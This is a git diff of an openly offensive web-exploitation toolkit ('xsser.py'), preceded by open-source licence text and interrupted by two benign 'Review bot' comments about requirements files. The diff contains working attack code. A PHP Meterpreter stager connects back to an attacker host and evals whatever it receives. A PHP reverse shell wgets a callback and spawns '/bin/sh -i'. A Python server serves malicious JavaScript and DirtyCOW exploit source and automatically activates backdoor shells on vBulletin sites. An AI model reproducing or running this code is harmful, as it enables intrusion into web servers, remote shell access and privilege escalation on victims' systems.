AUTHOR OR CONTRIBUTORS BE LIABLE + FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + SUCH DAMAGE. + . 
+ The licence and distribution terms for any publically available version or + derivative of this code cannot be changed. i.e. this code cannot simply be + copied and put under another distribution licence + [including the GNU Public Licence.] + +License: MIT + Permission is hereby granted, free of charge, to any person obtaining + a copy of this software and associated documentation files (the + "Software"), to deal in the Software without restriction, including + without limitation the rights to use, copy, modify, merge, publish, + distribute, sublicense, and/or sell copies of the Software, and to + permit persons to whom the Software is furnished to do so, subject to + the following conditions: + . + The above copyright notice and this permission notice shall be + included in all copies or substantial portions of the Software. + . + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE + LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION + OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION + WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +License: Artistic + Copyright (c) 2000-2006, The Perl Foundation. + . + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + . + Preamble + . + This license establishes the terms under which a given free software + Package may be copied, modified, distributed, and/or redistributed. + The intent is that the Copyright Holder maintains some artistic + control over the development of that Package while still keeping the + Package available as open source and free software. + . 
+ You are always permitted to make arrangements wholly outside of this + license directly with the Copyright Holder of a given Package. If the + terms of this license do not permit the full use that you propose to + make of the Package, you should contact the Copyright Holder and seek + a different licensing arrangement. + . + Definitions + . + "Copyright Holder" means the individual(s) or organization(s) + named in the copyright notice for the entire Package. + . + "Contributor" means any party that has contributed code or other + material to the Package, in accordance with the Copyright Holder's + procedures. + . + "You" and "your" means any person who would like to copy, + distribute, or modify the Package. + . + "Package" means the collection of files distributed by the + Copyright Holder, and derivatives of that collection and/or of + those files. A given Package may consist of either the Standard + Version, or a Modified Version. + . + "Distribute" means providing a copy of the Package or making it + accessible to anyone else, or in the case of a company or + organization, to others outside of your company or organization. + . + "Distributor Fee" means any fee that you charge for Distributing + this Package or providing support for this Package to another + party. It does not mean licensing fees. + . + "Standard Version" refers to the Package if it has not been + modified, or has been modified only in ways explicitly requested + by the Copyright Holder. + . + "Modified Version" means the Package, if it has been changed, and + such changes were not explicitly requested by the Copyright + Holder. + . + "Original License" means this Artistic License as Distributed with + the Standard Version of the Package, in its current version or as + it may be modified by The Perl Foundation in the future. + . + "Source" form means the source code, documentation source, and + configuration files for the Package. + . 
+ "Compiled" form means the compiled bytecode, object code, binary, + or any other form resulting from mechanical transformation or + translation of the Source form. + . + Permission for Use and Modification Without Distribution + . + (1) You are permitted to use the Standard Version and create and use + Modified Versions for any purpose without restriction, provided that + you do not Distribute the Modified Version. + . + . + Permissions for Redistribution of the Standard Version + . + (2) You may Distribute verbatim copies of the Source form of the + Standard Version of this Package in any medium without restriction, + either gratis or for a Distributor Fee, provided that you duplicate + all of the original copyright notices and associated disclaimers. At + your discretion, such verbatim copies may or may not include a + Compiled form of the Package. + . + (3) You may apply any bug fixes, portability changes, and other + modifications made available from the Copyright Holder. The resulting + Package will still be considered the Standard Version, and as such + will be subject to the Original License. + . + . + Distribution of Modified Versions of the Package as Source + . + (4) You may Distribute your Modified Version as Source (either gratis + or for a Distributor Fee, and with or without a Compiled form of the + Modified Version) provided that you clearly document how it differs + from the Standard Version, including, but not limited to, documenting + any non-standard features, executables, or modules, and provided that + you do at least ONE of the following: + . + (a) make the Modified Version available to the Copyright Holder + of the Standard Version, under the Original License, so that the + Copyright Holder may include your modifications in the Standard + Version. + . + (b) ensure that installation of your Modified Version does not + prevent the user installing or running the Standard Version. 
In + addition, the Modified Version must bear a name that is different + from the name of the Standard Version. + . + (c) allow anyone who receives a copy of the Modified Version to + make the Source form of the Modified Version available to others + under + . + (i) the Original License or + . + (ii) a license that permits the licensee to freely copy, + modify and redistribute the Modified Version using the same + licensing terms that apply to the copy that the licensee + received, and requires that the Source form of the Modified + Version, and of any works derived from it, be made freely + available in that license fees are prohibited but Distributor + Fees are allowed. + . + . + Distribution of Compiled Forms of the Standard Version + or Modified Versions without the Source + . + (5) You may Distribute Compiled forms of the Standard Version without + the Source, provided that you include complete instructions on how to + get the Source of the Standard Version. Such instructions must be + valid at the time of your distribution. If these instructions, at any + time while you are carrying out such distribution, become invalid, you + must provide new instructions on demand or cease further distribution. + If you provide valid instructions or cease distribution within thirty + days after you become aware that the instructions are invalid, then + you do not forfeit any of your rights under this license. + . + (6) You may Distribute a Modified Version in Compiled form without + the Source, provided that you comply with Section 4 with respect to + the Source of the Modified Version. + . + . + Aggregating or Linking the Package + . + (7) You may aggregate the Package (either the Standard Version or + Modified Version) with other packages and Distribute the resulting + aggregation provided that you do not charge a licensing fee for the + Package. Distributor Fees are permitted, and licensing fees for other + components in the aggregation are permitted. 
The terms of this license + apply to the use and Distribution of the Standard or Modified Versions + as included in the aggregation. + . + (8) You are permitted to link Modified and Standard Versions with + other works, to embed the Package in a larger work of your own, or to + build stand-alone binary or bytecode versions of applications that + include the Package, and Distribute the result without restriction, + provided the result does not expose a direct interface to the Package. + . + . + Items That are Not Considered Part of a Modified Version + . + (9) Works (including, but not limited to, modules and scripts) that + merely extend or make use of the Package, do not, by themselves, cause + the Package to be a Modified Version. In addition, such works are not + considered parts of the Package itself, and are not subject to the + terms of this license. + . + . + General Provisions + . + (10) Any use, modification, and distribution of the Standard or + Modified Versions is governed by this Artistic License. By using, + modifying or distributing the Package, you accept this license. Do not + use, modify, or distribute the Package, if you do not accept this + license. + . + (11) If your Modified Version has been derived from a Modified + Version made by someone other than you, you are nevertheless required + to ensure that your Modified Version complies with the requirements of + this license. + . + (12) This license does not grant you the right to use any trademark, + service mark, tradename, or logo of the Copyright Holder. + . + (13) This license includes the non-exclusive, worldwide, + free-of-charge patent license to make, have made, use, offer to sell, + sell, import and otherwise transfer the Package with respect to any + patent claims licensable by the Copyright Holder that are necessarily + infringed by the Package. 
If you institute patent litigation + (including a cross-claim or counterclaim) against any party alleging + that the Package constitutes direct or contributory patent + infringement, then this Artistic License to you shall terminate on the + date that such litigation is filed. + . + (14) Disclaimer of Warranty: + THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS "AS + IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE IMPLIED + WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR + NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL + LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL + BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL + DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF + ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +License: Apache + Version 2.0, January 2004 + http://www.apache.org/licenses/ + . + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + . + 1. Definitions. + . + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + . + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + . + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + . + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + . 
+ "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + . + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + . + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + . + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + . + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. 
For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + . + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + . + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + . + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. 
If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + . + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + . + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + . + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + . + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + . + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. 
You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + . + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + . + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + . + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + . + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + . + 8. 
Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + . + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + . + END OF TERMS AND CONDITIONS + . + APPENDIX: How to apply the Apache License to your work. + . + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + . 
+ Copyright [yyyy] [name of copyright owner] + . + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + . + http://www.apache.org/licenses/LICENSE-2.0 + . + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + +License: Zlib + This software is provided 'as-is', without any express or implied + warranty. In no event will the authors be held liable for any damages + arising from the use of this software. + . + Permission is granted to anyone to use this software for any purpose, + including commercial applications, and to alter it and redistribute it + freely, subject to the following restrictions: + . + 1. The origin of this software must not be misrepresented; you must not + claim that you wrote the original software. If you use this software + in a product, an acknowledgment in the product documentation would be + appreciated but is not required. + 2. Altered source versions must be plainly marked as such, and must not be + misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. \ No newline at end of file diff --git a/Shells/meterpreter/meterpreter.php b/Shells/meterpreter/meterpreter.php index 5dce3c2..50e698c 100644 --- a/Shells/meterpreter/meterpreter.php +++ b/Shells/meterpreter/meterpreter.php 
@@ -1,56 +1,56 @@ - -error_reporting(0); - - -$ip = 'LOCALHOST'; -$port = LOCALPORT; -$ipf = AF_INET; - -if (FALSE !== strpos($ip, ":")) { - - $ip = "[". $ip ."]"; - $ipf = AF_INET6; -} - -if (($f = 'stream_socket_client') && is_callable($f)) { - $s = $f("tcp://{$ip}:{$port}"); - $s_type = 'stream'; - } elseif (($f = 'fsockopen') && is_callable($f)) { - $s = $f($ip, $port); - $s_type = 'stream'; - } elseif (($f = 'socket_create') && is_callable($f)) { - $s = $f($ipf, SOCK_STREAM, SOL_TCP); - $res = @socket_connect($s, $ip, $port); - if (!$res) { die(); } - $s_type = 'socket'; - } else { - die('no socket funcs'); - } -if (!$s) { die('no socket'); } - -switch ($s_type) { -case 'stream': $len = fread($s, 4); break; -case 'socket': $len = socket_read($s, 4); break; - } -if (!$len) { - - - die(); - } -$a = unpack("Nlen", $len); -$len = $a['len']; - -$b = ''; - while (strlen($b) < $len) { - switch ($s_type) { - case 'stream': $b .= fread($s, $len-strlen($b)); break; - case 'socket': $b .= socket_read($s, $len-strlen($b)); break; - } - } - - -$GLOBALS['msgsock'] = $s; -$GLOBALS['msgsock_type'] = $s_type; -eval($b); -die(); - + +error_reporting(0); + + +$ip = 'LOCALHOST'; +$port = LOCALPORT; +$ipf = AF_INET; + +if (FALSE !== strpos($ip, ":")) { + + $ip = "[". 
$ip ."]"; + $ipf = AF_INET6; +} + +if (($f = 'stream_socket_client') && is_callable($f)) { + $s = $f("tcp://{$ip}:{$port}"); + $s_type = 'stream'; + } elseif (($f = 'fsockopen') && is_callable($f)) { + $s = $f($ip, $port); + $s_type = 'stream'; + } elseif (($f = 'socket_create') && is_callable($f)) { + $s = $f($ipf, SOCK_STREAM, SOL_TCP); + $res = @socket_connect($s, $ip, $port); + if (!$res) { die(); } + $s_type = 'socket'; + } else { + die('no socket funcs'); + } +if (!$s) { die('no socket'); } + +switch ($s_type) { +case 'stream': $len = fread($s, 4); break; +case 'socket': $len = socket_read($s, 4); break; + } +if (!$len) { + + + die(); + } +$a = unpack("Nlen", $len); +$len = $a['len']; + +$b = ''; + while (strlen($b) < $len) { + switch ($s_type) { + case 'stream': $b .= fread($s, $len-strlen($b)); break; + case 'socket': $b .= socket_read($s, $len-strlen($b)); break; + } + } + + +$GLOBALS['msgsock'] = $s; +$GLOBALS['msgsock_type'] = $s_type; +eval($b); +die(); + diff --git a/Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php b/Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php index 976304c..e5a4db5 100644 --- a/Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php +++ b/Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php @@ -53,7 +53,7 @@ $chunk_size = 1400; $write_a = null; $error_a = null; -$shell = 'uname -a; w; id; wget "LOCALHOST/php_shell_notify.txt" -q; /bin/sh -i'; +$shell = 'uname -a; w; id; wget "LOCALHOST/php_shell_notify.txt" -q -O /dev/null; /bin/sh -i'; $daemon = 0; $debug = 0; diff --git a/requirements-all-libraries-used.txt b/requirements-all-libraries-used.txt new file mode 100644 index 0000000..be173af --- /dev/null +++ b/requirements-all-libraries-used.txt @@ -0,0 +1,15 @@ +###### Requirements without Version Specifiers ###### +base64 +BaseHTTPServer +jsmin +os +pygame +random +re +requests +socket +subprocess +sys +time +traceback +zipfile \ No newline at end of file 
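Review bot: Most entries in this file are Python standard-library modules (base64, os, re, random, socket, subprocess, sys, time, traceback, zipfile, BaseHTTPServer), so `pip install -r requirements-all-libraries-used.txt` would either fail outright or resolve those names against PyPI and install whatever third-party project happens to own them, a dependency-confusion risk rather than a reproducible setup. If the file is meant as an inventory of imports, say so in the header so nobody feeds it to pip, e.g. `###### Inventory of imported modules (stdlib + third party) - NOT for pip install ######`. Otherwise trim it to the third-party packages actually used (jsmin, pygame, requests) with pinned versions, matching requirements.txt.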
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000..9b8b90a
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,3 @@
+###### Requirements without Version Specifiers ######
+jsmin
+pygame
\ No newline at end of file
diff --git a/xsser.py b/xsser.py
index 3953651..dba773a 100755
--- a/xsser.py
+++ b/xsser.py
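Review bot: `requests` is missing from requirements.txt even though xsser.py now imports it (the `+import requests` line later in this same patch), so a fresh `pip install -r requirements.txt` leaves the tool failing at import time; add a third line `requests`. The two listed packages are also unpinned, so installs are not reproducible and a later jsmin or pygame release can silently change behaviour; consider pinning the versions you tested with (e.g. `jsmin==<tested-version>`, placeholder shown here) and updating the header comment, which currently promises no version specifiers.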
@@ -1,434 +1,608 @@ #!/usr/bin/env python # -*- coding: utf-8 -*- # -# Version: 2.5.1 - TEST -# Date: 04/Dec/17 +# Version: 2.7.5 - Black Hat Europe Release + Extras +# Music Codename: Soul Cypherz - Maya +# Presentation Date: 07/Dec/17 +# Release Date: 08/Mar/2018 # Author: Hans-Michael Varbaek -# Company: Sense of Security -# Credits: MaXe / InterN0T +# Company: VarBITS +# Special Credits: MaXe / InterN0T # -# Requirements: -# - Gnome (gnome-terminal) -# - Bash -# - Msfconsole -# - Netcat (nc) -# - cURL (curl) [NEW] -# - PyGame (apt-get install python-pygame) [NEW] -# -# Written for: -# - Python 2.7.11 -# -# Tested on: -# - Kali Linux VM 2016.1 -# -# Tested against: -# - Chrome (14 Nov 2015) - This should still work. -# - FireFox (04 Nov 2016) -# -# Changelog: -# - WordPress Theme and Plugin injection are not using a hardcoded hostname anymore. (TARGETWEBSITE is now properly replaced) -# - Removed deprecated code for WordPress Theme and Plugin injection, so that the user is not asked twice to provide hostname to exploit. -# - Added dirtycow 32-bit and 64-bit source code files to the web servers. https://www.exploit-db.com/exploits/40616/ Note: This seems to cause kernel panic after the user quits the shell. -# - Removed --title from gnome-terminal commands as this option is no longer supported. -# - Notifications: -# -- Added notification to the console / web server log. -# -- Added a popup terminal notification with some ANSI text when the JavaScript is executed and "JS Shell Notify" is triggered. -# -- Added a voice notification when the Reverse PHP Shell (Notify) option is executed on the remote server. Shell attempts to wget back to this host to the PHP Shell Notify web handler. -# - Automation: -# -- vBulletin and WordPress shells are now automatically activated when the JavaScript is triggered. 
-# - New attack vectors: -# -- Joomla "SecurityCheck" Addon - https://www.exploit-db.com/exploits/39879/ - EDB ID: 39879 +# TODO List: +# - Use another type of web server that's easier to maintain. +# - Custom PHP shell that features a file manager. +# - Maybe reintroduce the feature that allows users to specify their own PHP code. +# - Python GUI like NCurses for example. +# - Make xsser.py compatible with Python3 and eventually switch to this version. +# - Check if xsser.py is run on Linux, as several commands still assume the host OS is Linux. +# - Ensure "requirements.txt" is up to date in each version, and that there's documentation for it. +# - Add proxy support for modules that automatically send the exploit. (e.g. SSH Socks Proxy) +# - All PHP shells uploaded to the target should be base64 encoded. +# - Maybe add additional obfuscation (or encryption) to the payloads in the future. +# - Regex replacement: with https://stackoverflow.com/questions/6116978/how-to-replace-multiple- +# substrings-of-a-string +# https://gomputor.wordpress.com/2008/09/27/search-replace-multiple-words-or-characters-with-python/ +# https://www.safaribooksonline.com/library/view/python-cookbook-2nd/0596007973/ch01s19.html +# https://stackoverflow.com/questions/6116978/how-to-replace-multiple-substrings-of-a-string +# - Remake the menu system. It's not very maintainable. +# - Remake how exploits are loaded by the tool. +# -- Then add a lot more exploits to this tool. +# - Add payloads for other content management systems such as Drupal. 
# ============================================================================================ # -# Standard libraries -import sys import os -import time - -# For payload preparation import re +import sys +import time import base64 - -# For exploits and our HTTP server -import urllib # Needed for Joomla URL encoding [NEW] import random -import httplib -import socket +import zipfile +import requests +import traceback +from socket import error as socket_error +from subprocess import check_output # TODO: Switch completely to this or a similar library instead of os.system() from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer -# Import pygame audio library -import pygame # [NEW] +# Non-Standard Libraries +import pygame # Audio notifications +from jsmin import jsmin # Minified JavaScript payloads + +# Old libraries no longer being used. (There's a good chance some of them may be used in the future.) +# import urllib +# import httplib +# import socket + +# Used for generating random filenames for web server requests +random_filename = list('abcdefghijklmnopqrstuvwxyz0123456789') +# print "".join(random.sample(random_filename, 5))+".js" + + +# https://stackoverflow.com/questions/1855095/how-to-create-a-zip-archive-of-a-directory +def zipdir(path, ziph): + # ziph is zipfile handle + for root, dirs, files in os.walk(path): + for filename in files: + ziph.write(os.path.join(root, filename)) + + +# Generate the Hello Shell on startup. +# TODO: Make the backdoor name fully dynamic in the future. +def generate_helloshell(): + zipf = zipfile.ZipFile('Hello_Shell.zip', 'w', zipfile.ZIP_DEFLATED) + zipdir('Hello_Shell/', zipf) + zipf.close() + + +def enable_js_alert(): + os.system("chmod +x js_alert.sh") + + +# Exit program - Default return code is zero. 
+def exit_xsser(exit_code=0): + sys.exit(exit_code) -# Required constants -menu_actions = {} # ====================== # # DEFINED CLASSES -# ====================== # - -# ANSI font color class -class fontcolors: - RED = '\033[91m' - GREEN = '\033[92m' - YELLOW = '\033[93m' - BLUE = '\033[94m' - ENDC = '\033[0m' - BOLD = '\033[1m' - UNDERLINE = '\033[4m' +# ====================== # + +class FontColors: + # ANSI font color class + RED = '\033[91m' + GREEN = '\033[92m' + YELLOW = '\033[93m' + BLUE = '\033[94m' + ENDC = '\033[0m' + BOLD = '\033[1m' + UNDERLINE = '\033[4m' + + def __init__(self): + self.not_used = None + +# TODO: Look into using another type of "web server" which is just as simple but also more flexible. +# TODO: Merge vBSEO and the WordPress/Joomla classes in the future. # vBSEO web server class (LinkBack vulnerability specific) class MyHandler(BaseHTTPRequestHandler): - def do_GET(self): - try: - if self.path.endswith("%s.php" % evil_php): - self.send_response(200) - self.send_header('Content-type','text/html') - self.end_headers() - self.wfile.write('%s' % xss_title) - self.wfile.write('

vBSEO Stored Cross-site Scripting



') - self.wfile.write('I found this awesome forum' % target_link) - self.wfile.write('
') - return - - if self.path.endswith("%s.js" % evil_jsf): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(js_output) # Serve File - return - - if self.path.endswith("js_shell_notify.txt"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write('Hello?') - # NEW FEATURES BELOW - # Terminal and Popup Terminal Notifications - print fontcolors.YELLOW + fontcolors.BOLD+"[!] JavaScript payload was activated!"+fontcolors.ENDC - os.system('gnome-terminal --hide-menubar -e "bash -c \' ./js_alert.sh; exec bash\'"') # ASCII ART - # Activate shell request for vBulletin - os.system('curl "%s/misc.php?activateshell=true" -o /dev/null -stderr /dev/null &' % finaltarget) # If the Python script encounters an error, the response (i.e. error) will be in the JS output which breaks our payload. - return - - if self.path.endswith("php_shell_notify.txt"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write('Hello again?') - YouGotShell() # NEW FEATURE - return - - if self.path.endswith("dcow32.c"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(dcow32_output) # Serve File - return - - if self.path.endswith("dcow64.c"): - self.send_response(200) - self.send_header('Content-type', 'text/plain') - self.end_headers() - self.wfile.write(dcow64_output) # Serve File - return - - if self.path.endswith(""): - self.send_response(200) - self.send_header('Content-type', 'text/html') - self.end_headers() - self.wfile.write('Empty

Nothing to see here..

') - return - - return - - except IOError: - self.send_error(404,'File Not Found: %s' % self.path) + # noinspection PyPep8Naming + def do_GET(self): # I know this is not PEP8 compliant, but this class uses the "do_GET" format. + try: + if self.path.endswith("{}.php".format(evil_php)): + self.send_response(200) + self.send_header('Content-type', 'text/html') + self.end_headers() + self.wfile.write('{}'.format(xss_title)) + self.wfile.write('

vBSEO Stored Cross-site Scripting



') + self.wfile.write('I found this awesome forum'.format(target_link)) + self.wfile.write('
') + return + + if self.path.endswith("{}.js".format(evil_jsf)): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(js_output) # Serve JS contents + return + + if self.path.endswith("js_shell_notify.txt"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.send_header('Access-Control-Allow-Origin', '*') # Mostly here to limit browser console errors. + self.end_headers() + self.wfile.write('Hello?') + # NEW CODE BELOW + # Terminal and Popup Terminal Notifications + print FontColors.YELLOW + FontColors.BOLD + "[!] JavaScript payload was activated!" + FontColors.ENDC + # os.system('gnome-terminal --hide-menubar -e "bash -c \' ./js_alert.sh; exec bash\'"') # ASCII ART + # Everything seems to becoming deprecated with gnome-terminal, so we've switched to xterm. + # xterm -hold -e command + # check_output(['xterm', '-fa', '"Monospace"', '-fs', '14', '-hold', '-e', './js_alert.sh', '&']) + os.system('xterm -fa "Monospace" -fs 14 -hold -e ./js_alert.sh &') # Size 14 is quite large + # xterm -hold -e 'ls' & # Without the ampersand xterm blocks the python script from executing. + # TODO: Replace os.system with e.g. subprocess.call() or check_output() in future versions. + # subprocess.call(["ls", "-al"]) + # subprocess.call("ls -al", shell=True) + # Activate shell request for vBulletin + + # Because this happens so fast, we need to introduce a one second delay. + print "[*] Waiting 1 second before automatically activating shell." + time.sleep(1) + # TODO: Fix the odd and random 404 error that sometimes occurs. + payload = {"activateshell": "true"} + url = "http://{}/misc.php".format(finaltarget) + requests.get(url, params=payload, timeout=3) + # TODO: Ask the user for the full URL including HTTP/HTTPS in the future. 
+ # os.system( + # 'curl "%s/misc.php?activateshell=true" -o /dev/null -stderr /dev/null &' % finaltarget) + # If the Python script encounters an error, the response (i.e. error) will be in the JS output + # which breaks our payload. + return + + if self.path.endswith("php_shell_notify.txt"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write('Hello again?') + you_got_shell() + return + + if self.path.endswith("dcow32.c"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(dcow32_output) # Serve File + return + + if self.path.endswith("dcow64.c"): + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(dcow64_output) # Serve File + return + + if self.path.endswith(""): + self.send_response(200) + self.send_header('Content-type', 'text/html') + self.end_headers() + self.wfile.write( + 'Empty

Nothing to see here..

